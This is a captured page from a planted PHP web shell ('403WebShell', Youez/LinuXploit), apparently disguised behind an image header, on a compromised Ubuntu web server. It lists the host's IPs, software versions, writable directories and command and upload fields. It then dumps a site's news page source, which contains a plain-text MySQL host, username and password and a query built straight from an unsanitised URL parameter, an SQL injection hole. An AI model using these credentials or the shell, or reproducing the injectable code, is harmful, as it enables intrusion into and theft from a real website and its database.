????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.astacus.net/ger/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.astacus.net/ger/notiser.php

<table width="793" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="100" valign="top"><br></td>
    <td width="440" height="20" valign="top" class="text12"><p><br>
        <span class="text16"></span>
        
        
		<br>
		<br>
		<?php
			 			mysql_connect ("mysql2.db.bahnhof.se", "myus000116", "rvdctpre");
						mysql_select_db ("astacus");
						
						
						if(isset($_GET['newsid'])){
					  		$sql = "SELECT * FROM tblNews where id = ".$_GET['newsid']." LIMIT 1";						
						}else{
							$sql = "SELECT * FROM tblNews order by date desc LIMIT 1";
						}
						
						$result = mysql_query($sql);
						
						while ($row = mysql_fetch_assoc($result)){
							$id = $row['id'];
							$subject = $row['subject'];
							$date = $row['date'];
							$text = $row['text'];
							$text = nl2br($text);
							echo ("<p><span class='text16'><strong>" .$date . " - " . $subject . "</strong></span><br><br>" . $text . "</p>");
						}
						
						mysql_free_result($result);
					?>
		
		<br>
        <br>
        <span class="text16">        <br>
        <strong>Tidigare notiser: </strong></span><br>
		
		<?php
			 			mysql_connect ("mysql2.db.bahnhof.se", "myus000116", "rvdctpre");
						mysql_select_db ("astacus");
					  	$sql = "SELECT * FROM tblNews order by date desc";
						$result = mysql_query($sql);
						
						while ($row = mysql_fetch_assoc($result)){
							$id = $row['id'];
							$subject = $row['subject'];
							$date = $row['date'];
							$text = $row['text'];
							echo("<table width='400' border='0' cellspacing='0' cellpadding='0'><tr><td width='100'><a href='index.php?id=12&newsid=".$id."'>".$date."</a></td><td width='300'><a href='index.php?id=12&newsid=".$id."'>".$subject."</a></td></tr></table>");
							
						}
						
						mysql_free_result($result);
					?>
		
		
      </p>
      
	  
	        <p>&nbsp;      </p>
      <p>&nbsp;</p>
    <p>&nbsp;</p></td>
    <td><p><br>
          <span class="text16"></span></p>      <p><span class="text16"><strong><br>
    </strong></span> </p></td>
  </tr>
</table>

Youez - 2016 - github.com/yon3zu
LinuXploit